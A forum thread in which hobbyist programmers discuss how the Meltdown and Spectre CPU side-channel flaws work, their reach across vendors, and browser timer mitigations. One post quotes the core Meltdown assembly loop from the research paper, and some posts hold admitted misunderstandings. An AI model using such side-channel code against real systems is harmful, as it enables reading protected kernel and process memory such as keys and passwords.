Intel Spectre bug?

You can talk about almost anything that you want to on this board.

Moderator: Moderators

User avatar
Dwedit
Posts: 4924
Joined: Fri Nov 19, 2004 7:35 pm
Contact:

Intel Spectre bug?

Post by Dwedit »

Does anyone understand how this works? I understand Meltdown fine, but I have no idea what Spectre is supposed to be. Can anyone explain it?
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!
User avatar
Bregalad
Posts: 8056
Joined: Fri Nov 12, 2004 2:49 pm
Location: Divonne-les-bains, France

Re: Intel Spectre bug?

Post by Bregalad »

To be honest I didn't understand either bug, despite throwing a few hours at them. My understanding they exploit/abuse how branch prediction works and can retrieve data they should not be able to by doing an "if () " reading illegal memory, and measuring time it takes until the exception popus up. The bug is inherent to hardware so the only way to not have it would be to discard branch prediction or not having a reliable timer.

Now, how could nobody think about this between 1995-2017, and wait 6 more month before publishing it until janauary 2018, I really wonder - even though personally I wouldn't have thought of it.
User avatar
Dwedit
Posts: 4924
Joined: Fri Nov 19, 2004 7:35 pm
Contact:

Re: Intel Spectre bug?

Post by Dwedit »

Meltdown makes perfect sense. The code snippet from the pdf is very easy to follow:

Code: Select all

 ; rcx = kernel address
 ; rbx = probe array
retry:
 mov al, byte [rcx]
 shl rax, 0xc
 jz retry
 mov rbx, qword [rbx + rax]
The byte fetch will trigger an exception, but due to the flaw, it has already gone ahead and done the read into the probe array, so it now cached. Even though the values are discarded, they were still used.

I saw the Youtube video demonstrating dumping kernel memory, so you can see that it clearly works.

Meltdown is easy to follow since it's in the same address space as the process. But Spectre remains a mystery to me.
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!
User avatar
rainwarrior
Posts: 8732
Joined: Sun Jan 22, 2012 12:03 pm
Location: Canada
Contact:

Re: Intel Spectre bug?

Post by rainwarrior »

I think Meltdown is a more specific form of attack that more or less directly reads from kernel memory.

Spectre on the other hand seems to be a new area of vulnerability for exploiting existing programs. Like how an unchecked array bound in a program might leave you with a way to exploit it, now that we're aware of ways to manipulate and time branch prediction via the cache, a checked bound is vulnerable too if you can get it to mispredict the branch and do the array access anyway.

Like if you can run a javascript program in a browser, you can write that program to cause such mispredictions deliberately and use them to read everything the browser process knows, rather than just the stuff that javascript program is supposed to have access to. You have to know the program to be able to exploit it, not just the CPU.

At least, that's the gist of what I got from this whitepaper:
https://spectreattack.com/spectre.pdf
User avatar
Dwedit
Posts: 4924
Joined: Fri Nov 19, 2004 7:35 pm
Contact:

Re: Intel Spectre bug?

Post by Dwedit »

So spectre basically requires scripting or other ways of executing code within another process? Got it.

Seems like it would be useful for exploiting web browsers to find out the address layout before going to ROP.
Here come the fortune cookies! Here come the fortune cookies! They're wearing paper hats!
lidnariq
Posts: 11432
Joined: Sun Apr 13, 2008 11:12 am

Re: Intel Spectre bug?

Post by lidnariq »

Both flaws require the ability to run arbitrary but jailed code on the target CPU.

Both flaws involve the same ultimate failure: reading memory that you're "supposed" to not be able to. Meltdown's "just" the version that compromises the read protection guarantees made by the page table.
User avatar
pubby
Posts: 583
Joined: Thu Mar 31, 2016 11:15 am

Re: Intel Spectre bug?

Post by pubby »

Dwedit wrote:So spectre basically requires scripting or other ways of executing code within another process? Got it.
It's less restrictive than that. If you have a sequence of bytes you want to run and that sequence of bytes happens to exist in the program's address space, you can train the branch predictor from outside the program to jump there and execute it speculatively. And since speculative execution touches the cache, it can be used to leak information.
User avatar
rainwarrior
Posts: 8732
Joined: Sun Jan 22, 2012 12:03 pm
Location: Canada
Contact:

Re: Intel Spectre bug?

Post by rainwarrior »

The prognosis I've understood is that Meltdown can be corrected by having the OS take protective measures with its kernel paging, at some performance cost. Spectre is more insidious, since it operates from within a program in its own space, and exploits very normal and extremely common code (e.g. jump tables, bounded array lookups, etc.). Not something that can really be patched directly, or that most software developers could even try to prevent, but probably browsers and other critical stuff can be vigilant in addressing known attacks as they appear. A hydra monster always growing new heads.

I feel like Intel is about to have a very good sales year once they get a new CPU revision out. ;P

(Also, the Spectre attacks work on most CPUs, not just Intel design?)
lidnariq
Posts: 11432
Joined: Sun Apr 13, 2008 11:12 am

Re: Intel Spectre bug?

Post by lidnariq »

Both of these flaws are obvious-in-hindsight failures given any kind of speculative fetch at all. There's a reason why Spectre basically affects every fast CPU ever: speculative fetch is just way too huge a performance benefit to think that you could possibly recoup the performance loss by excluding it.

Meltdown, for whatever it's worth, doesn't only affect Intel's CPU. It's just that Intel was the only corporation to consistently put the permissions check on the wrong (i.e. higher performance) side of the L1 cache fetch. But there's a reason why the newest highest-performing ARM cores are also vulnerable. I think I remember reading it being true of several markedly older POWER cores, too.

There's a fascinating article that came up in the wake of these revelations about the PowerPC core in the Xbox 360 and its cache-coherency-violating XDCBT instruction.
User avatar
Bregalad
Posts: 8056
Joined: Fri Nov 12, 2004 2:49 pm
Location: Divonne-les-bains, France

Re: Intel Spectre bug?

Post by Bregalad »

rainwarrior wrote:I think Meltdown is a more specific form of attack that more or less directly reads from kernel memory.
Also my understanding is that Spectre is more like a family of possible exploits, while Meltdown is a particular implementation of such an exploit that actually works. I might be wrong.
Like if you can run a javascript program in a browser, you can write that program to cause such mispredictions deliberately and use them to read everything the browser process knows, rather than just the stuff that javascript program is supposed to have access to. You have to know the program to be able to exploit it, not just the CPU.
So in my understanding for Spectre to work you need a very specific CPU *and* a very specific version of a very specific program, with programs constantly updating every week it needs the exploit has to be updated as well to take account for new low-level code; also it only allows for spying data on one person's computer which is indeed problematic but Google already does that for everyone using Chrome or any Google-related website so it's nothing new - it doesn't allow to write to memory so to actually implement malware.
Both of these flaws are obvious-in-hindsight failures given any kind of speculative fetch at all. There's a reason why Spectre basically affects every fast CPU ever: speculative fetch is just way too huge a performance benefit to think that you could possibly recoup the performance loss by excluding it.
My understanding is that you acess data not by reading it directly, but by measure time it takes to read it, and see whether it was a cache hit or miss, so data is "read" one bit at a time, and some kind of timer is probably used to measure this time. If the timer is made innacurate enough so that it can't distinguish accurately the difference between a cache hit or a cache miss, then data can't be retreived accurately and the exploit is impossible, even if speculative execution is still enabled. Even in current state I think there is some bits which are sometimes read wrongly, as I have seen a video drawing a cat picture with spectre, and there was some random noise on the picture. So just fixing timer to be innacurate might solve the issue.
I feel like Intel is about to have a very good sales year once they get a new CPU revision out. ;P
Or AMD ;P

(By the way Intel Itanium processors seems to be unaffected because they lack hardware speculative execution, which is mostly done compile time)
User avatar
rainwarrior
Posts: 8732
Joined: Sun Jan 22, 2012 12:03 pm
Location: Canada
Contact:

Re: Intel Spectre bug?

Post by rainwarrior »

It doesn't need to be quite that specific, I don't think. Your exploiting program can actually search for the needed code fragments to exploit (and you can even use stuff in shared DLLs). I think you need to know something about the program to find an opening in the first place, but I think it'd be tough to sanitize a big API like javascript. There's probably clever ways to prevent a lot of it, but it seems like there are a lot of open holes.

As for timers, you can always repeat the tests to get around timer accuracy. It doesn't close the hole, just reduces bandwidth? That might actually be one of the things browsers have currently disabled in response, though there might be multiple ways to create effective timers?

Edit: Yes, it looks like exactly that was done. https://blog.mozilla.org/security/2018/ ... ng-attack/


Then again, I'm surprised that I haven't yet seen news of this thing in action. Just research demos. Where's the spectre supervirus? Maybe we're lucky and its too hard to use effectively?
lidnariq
Posts: 11432
Joined: Sun Apr 13, 2008 11:12 am

Re: Intel Spectre bug?

Post by lidnariq »

Both Spectre and Meltdown are "only" (n.b. scare quotes; I don't mean to imply this isn't a serious problem) useful for exfiltration. Meltdown lets you bypass kASLR ... if you have an attack that would have been hampered by having to find entry points. Spectre lets you use javascript to read sensitive data out of another web browser tab ... if the attackee has sensitive data to read.

Like an FTP server providing read-only access to the entire filesystem, the attacker still has to have something to actually attack. It just makes that attack easier.
tepples
Posts: 22708
Joined: Sun Sep 19, 2004 11:12 pm
Location: NE Indiana, USA (NTSC)
Contact:

Re: Intel Spectre bug?

Post by tepples »

lidnariq wrote:Like an FTP server providing read-only access to the entire filesystem, the attacker still has to have something to actually attack.
Your password manager, your cryptocurrency wallets, and your PGP and SSH private keys, for a start. Someone who can SSH in can install ransomware.
User avatar
rainwarrior
Posts: 8732
Joined: Sun Jan 22, 2012 12:03 pm
Location: Canada
Contact:

Re: Intel Spectre bug?

Post by rainwarrior »

Seeing news today about bitcoin miners slipping into YouTube ads doesn't fill me with hope. :(
https://arstechnica.com/information-tec ... cy-miners/

Not a Spectre thing, of course, but it's a bit scary that unintended execution like this can even happen on a site like YouTube, that I'd normally presume is safe to visit.
Revenant
Posts: 462
Joined: Sat Apr 25, 2015 1:47 pm
Location: FL

Re: Intel Spectre bug?

Post by Revenant »

rainwarrior wrote:Not a Spectre thing, of course, but it's a bit scary that unintended execution like this can even happen on a site like YouTube, that I'd normally presume is safe to visit.
And this is exactly why ad blockers are such a valuable anti-malware tool.
Post Reply